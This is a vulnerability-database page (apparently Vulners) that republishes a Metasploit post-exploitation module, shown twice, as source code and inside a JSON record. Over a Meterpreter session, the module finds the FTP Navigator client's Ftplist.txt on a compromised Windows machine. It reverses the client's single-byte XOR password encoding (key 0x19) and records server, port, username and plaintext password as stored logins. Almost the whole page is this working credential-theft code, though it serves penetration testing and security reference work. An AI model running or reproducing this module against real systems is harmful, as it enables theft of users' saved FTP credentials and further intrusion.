Search...

Windows Gather FTP Navigator Saved Password Extraction

2011-10-11T05:45:03

ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/auxiliary/report'

class MetasploitModule &lt; Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           =&gt; 'Windows Gather FTP Navigator Saved Password Extraction',
      'Description'    =&gt; %q{
        This module extracts saved passwords from the FTP Navigator FTP client.
        It will decode the saved passwords and store them in the database.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt; ['theLightCosine'],
      'Platform'       =&gt; [ 'win' ],
      'SessionTypes'   =&gt; [ 'meterpreter' ]
    ))
  end

  def run
    key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
    val_name = "InstallLocation"
    installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"

    path = "#{installdir}Ftplist.txt"

    begin
      ftplist = client.fs.file.new(path,'r')
    rescue Rex::Post::Meterpreter::RequestError =&gt; e
      print_error("Unable to open Ftplist.txt: #{e}")
      print_error("FTP Navigator May not Ne Installed")
      return
    end

    lines = ftplist.read.split("\n")
    lines.each do |line|
      next if line.include? "Anonymous=1"
      next unless line.include? ";Password="

      dpass    = ""
      username = ""
      server   = ""
      port     = ""

      line.split(";").each do |field|
        next if field.include? "SavePassword"

        if field.include? "Password="
          epass = split_values(field)
          dpass = decode_pass(epass)
        elsif field.include? "User="
          username = split_values(field)
        elsif field.include? "Server="
          server = split_values(field)
        elsif field.include? "Port="
          port = split_values(field)
        end
      end

      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
      service_data = {
        address: Rex::Socket.getaddress(server),
        port: port,
        protocol: "tcp",
        service_name: "ftp",
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: self.refname,
        username: username,
        private_data: dpass,
        private_type: :password
      }

      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        access_level: "User",
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
    end
  end

  def split_values(field)
    values = field.split("=",2)
    return values[1]
  end

  def decode_pass(encoded)
    decoded = ""
    encoded.unpack("C*").each do |achar|
      decoded &lt;&lt; (achar ^ 0x19)
    end
    return decoded
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-03T03:06:02", "viewCount": 111, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR/"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411116}}